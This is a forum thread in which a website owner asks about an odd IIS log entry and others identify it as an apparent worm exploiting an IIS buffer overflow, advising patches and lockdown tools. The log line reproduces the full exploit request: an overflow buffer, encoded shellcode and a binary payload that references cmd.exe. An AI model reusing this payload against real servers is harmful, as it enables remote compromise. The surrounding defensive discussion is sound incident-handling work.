Log File Records

Posted on 2005-05-03
Last Modified: 2013-12-04
I have a website (on Win2k & IIS 5.0) that insidently goes down every sunday night.  All this time I suspected ASP.NET being the problem with aspnet_wp.exe not restarting.. but I found an interesting correlation between down time and my log files.

Below is one row of an HTTP Request sent last saturday right before my server went down. I see this post being made about 10 times before my server went down.  Can anyone tell me a bit about this?  

My first assumption was that ASP.NET is crashing IIS and therefor the log files are getting erroniouse input, but looking at the IP below, I suspect wrong doings..  This is not my IP, not my host IP and looks to me like someone is trying to exceed the request buffer and access memory space..

Can anyone tell me what this code would do? How can I secure my server from being effected from this type of attack?

------------------------------------------------- - - [30/Apr/2005:08:59:51 -0800] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%u898b%u77e8%u0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000%ue0ff%u9090=x&ë+_됐èõÿÿÿoð}-‹÷f¸H3Éf‹È´™ü¬2Īâú$쟙™eªP(¹)½k7_Þf™q”™™q™™q×›™™Úœ™™qÈ›™™q½š™™Þœ™™q'˜™™Öœ™™Þœ™™qæ›™™Òœ™™qÇ™™™q™™™a™íyÒœ™™Éf+”Ÿ™™Þœ™™Éf+”Ÿ™™¶œ™™Éf+œ™™¢œ™™Éf+œ™™!™™™™ÉÖœ™™Éf+\œ™™!™™™™Éf+Oœ™™ZÒœ™™ó™ó€š˜™™ÉÒœ™™Éf+šŸ™™Z”“Îð÷÷íØìíöØííøúò¹Ï«©”“”“ñ+™™™f+&œ™™¶œ™™q_™™™af–/™™™a™íÎ++++󙦜™™Éñ™™™Úœ™™É¶œ™™Éf+/œ™™a™–™™™ó™¦œ™™ÉÚœ™™ÉÒœ™™Éf+šŸ™™afíý++++ró™ñ™™™Úœ™™ÉÒœ™™Éf+‘Ÿ™™a™í§++++afí¬++++ªBʦœ™™ÊÉÚœ™™É¢œ™™Éf+5œ™™a™í++++p²fffªYÑZªYZªBʽ›™™ÊªBÊÊÊÉf++œ™™a™í’++++½›™™Z!ffffZ™™™™Úœ™™^™Ý™™™Éf+þœ™™Úœ™™ªœ™™ÚÙÚ¥®œ™™Ú¡!˜˜™™ÚµÊʪYÉÉÉÙÉÑÉÉ쟙™ÉªYÉf+™ªœ™™Éf+œ™™®œ™™Éf+œ™™Úœ™™™Zñ™™™óÙf+9œ™™ZªYÉw›™™^™•™™™Éªœ™™É¶œ™™Éf+Åœ™™ªYÉw›™™É¢œ™™É®œ™™Éf+Åœ™™Z™™™™™™™™˜™™™É¸š™™^š‰™™™Ê۝™™ÊÉf+eœ™™Aa™ÁåEZZ‰™™™óŠöš™™Éf+½Ÿ™™öš™™Éf+©Ÿ™™a™í»++++é•ge4a™íŠ++++™¥“íi¥Yíu¥5íqZn4™Z™™™™™™™™™™™™™™™™™™™™Úœ™™Éó›f+€Ÿ™™ó™ó˜ó›f+pœ™™af–™™™Þœ™™¦œ™™^š˜™™™óÊóñff™™Éf+§Ÿ™™a™ìé++++ÿöŸ™™ÿݝ™™蟙™ߝ™™afì–++++q³fffߝ™™Þœ™™ó‰۝™™ÊÉf+iœ™™a™ìº++++óœÞœ™™Éf+lœ™™a™ì’++++Þœ™™ZªYZ›™™ú™™™™™™™™™™™™!™™hî¡ÔÃ+™íž++++ÑrhA꥚jïášj繚b׍ªKÏÎȦšb,ÁŸ™™ªP(žjÿ>í•++++ÀÆ^Û{FÀÆÇSß½šZHxšXªPÿ‘ß…šZXx›šX™šZòŸ™™ZÒŸ™™qÉ™™™þŸ™™Z$Êœ™™^Îq¶™™™ÆÉ«YªPnHek7Á¦™íŽ++++ÉÎFq„™™™ÆžÁÞÞÞÞr@Þ¦™ìSZÊþŸ™™ÉfŠÂZÎ$òŸ™™ÊÉfŽÆZ™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™ÒÜË×ÜÕª«™ÚëüøíüÉðéü™ÞüíÊíøëíìéÐ÷ÿöØ™ÚëüøíüÉëöúüêêØ™ÚõöêüÑø÷ýõü™Éüüò×øôüýÉðéü™ÞõöûøõØõõöú™Îëðíüßðõü™Ëüøýßðõü™Êõüüé™Íüëôð÷øíüÉëöúüêê™ÜáðíÍñëüøý™™Îʫƪ«™êöúòüí™ûð÷ý™õðêíü÷™øúúüéí™êü÷ý™ëüúï™úõöêüêöúòüí™ÎÊØÊíøëíìé™þüíñöêí÷øôü™þüíñöêíûà÷øôü™êüíêöúòöéí™™™ÕöøýÕðûëøëàØ™ÞüíÉëöúØýýëüêê™êëî¨éî™úA®?„cmd.exe$ HTTP/1.1" 404 4203

Thank you all in advance!

- Eyal.
Question by:poogy21
    LVL 12

    Accepted Solution

    I think this may be a worm attempting to take advantage of this IIS vulnrability:
    LVL 32

    Expert Comment

    Is your machine patched with the latest updates for Windows and IIS?
    LVL 2

    Author Comment


    All Patches have been installed.  And I'm not entirely sure that this is actually causing any problem.
    I guess it could be a worm.  But why whould I get hit by a worm directly from Italy?  You would imagine that I would get hit by networks closer to my ip block.
    But it definetly is a reason for concern.

    I have a different problem with ASPNET user permissions and restarting the worker process. But I belive this worm / hacker is trigering a worker process restart.  
    And since my aspnet_wp.exe is running into permissions problems, my server times out. :(   when it pures..

    Any ideas on how to go about filtering or blocking this type of mischif?
    LVL 12

    Expert Comment

    First, update all the patches and any latest updates...then use IISlockdown to lockdown the IIS webserver...Then you can use MBSA to furthur study the situation..
    From the request it seems the requestor is requesting for some junk...Certainly its not a valid request it seems....
    Worms can be originated from any place on the planet...Thats the good n bad of internet..when you connect to internet the whole planet is on a single network...
    For your ASP.NET question i may not be in a position to solve the issue but you can modify or change it according to your needs with some help from your programmers...
    or our EE gurus can definetly help you...
    LVL 32

    Expert Comment

    Yes, highly recommend that you download and run MBSA to see if any patches were missed.
    You can get it from:
    LVL 12

    Expert Comment

    If all patches are up to date then this should not be an issue but by the look of your log file someone (or a worm) appears to be trying to open a remote command prompt (with the CMD.exe at the end of the data).

    You could try and push the same code to a test server (if you have one available) to test if your theory on the process restart is correct.

    Hope this helps.

    Featured Post

    Enabling OSINT in Activity Based Intelligence

    Activity based intelligence (ABI) requires access to all available sources of data. Recorded Future allows analysts to observe structured data on the open, deep, and dark web.

    Join & Write a Comment

    Recently, I read that Microsoft has analysed statistics for their security intelligence report. It revealed: still, the clear majority of windows users do their daily work as administrator. An administrative account is a burden, security-wise. My ar…
    This is a short article about OS X KeRanger, and what people can do to get rid of it.
    Illustrator's Shape Builder tool will let you combine shapes visually and interactively. This video shows the Mac version, but the tool works the same way in Windows. To follow along with this video, you can draw your own shapes or download the file…
    Polish reports in Access so they look terrific. Take yourself to another level. Equations, Back Color, Alternate Back Color. Write easy VBA Code. Tighten space to use less pages. Launch report from a menu, considering criteria only when it is filled…

    733 members asked questions and received personalized solutions in the past 7 days.

    Join the community of 500,000 technology professionals and ask your questions.

    Join & Ask a Question

    Need Help in Real-Time?

    Connect with top rated Experts

    22 Experts available now in Live!

    Get 1:1 Help Now